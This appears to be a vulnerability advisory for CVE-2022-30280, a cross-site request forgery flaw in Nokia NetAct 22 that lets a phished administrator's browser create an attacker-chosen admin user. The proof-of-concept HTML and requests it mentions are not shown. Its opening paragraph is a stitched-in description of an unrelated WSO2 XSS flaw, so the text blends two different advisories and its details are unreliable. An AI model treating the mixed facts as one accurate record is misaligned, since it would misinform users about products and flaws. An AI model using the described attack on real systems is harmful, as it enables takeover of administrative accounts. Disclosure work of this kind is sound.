An issue was discovered in WSO2 Enterprise Integrator 6.4.0. A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in the Management Console under /carbon/mediation_secure_vault/properties/ajaxprocessor.jsp via the “name” parameter. Session hijacking or similar attacks would not be possible.

Vulnerability Description: Cross-Site Request Forgery (CWE-352)

Software Version: v22.0.0.62

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-30280

CVSv3: 8.8

Severity: High

Credits: Massimiliano Ferraresi, Massimiliano Brolli

/SecurityManagement/html/createuser.jsf in Nokia NetAct 22 allows CSRF. A remote attacker is able to create users with arbitrary privileges, even administrative privileges. The application (even if it implements a CSRF token for the random GET request) does not ever verify a CSRF token. With a little help of social engineering/phishing (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.

Step-by-step instructions and PoC

It’s worth to remark that from the admin profile it is possible to add users with various privileges by exploiting this endpoint:

·       https://hostname/SecurityManagement/html/listusers.jsf

The following image shows the application  without testCSRF profile:

The administrator, who is logged into the application, is induced to visit, by means of phishing or social engineering, an endpoint containing a specific HTML code csrf2.html

Then, the administrator's browser will sends the following HTTP requests to the NetAct application that accept the request with arbitrary Origin and Referer.

If a logged  system administrator visits the endpoint with malicious javascript code crafted by an attacker, the new user testCSRF will appear in the application with admin privileges.

Security Impact

By exploiting this issue, a remote attacker is able to add arbitrary user on Nokia NetAct on behalf of a regular platform administrator.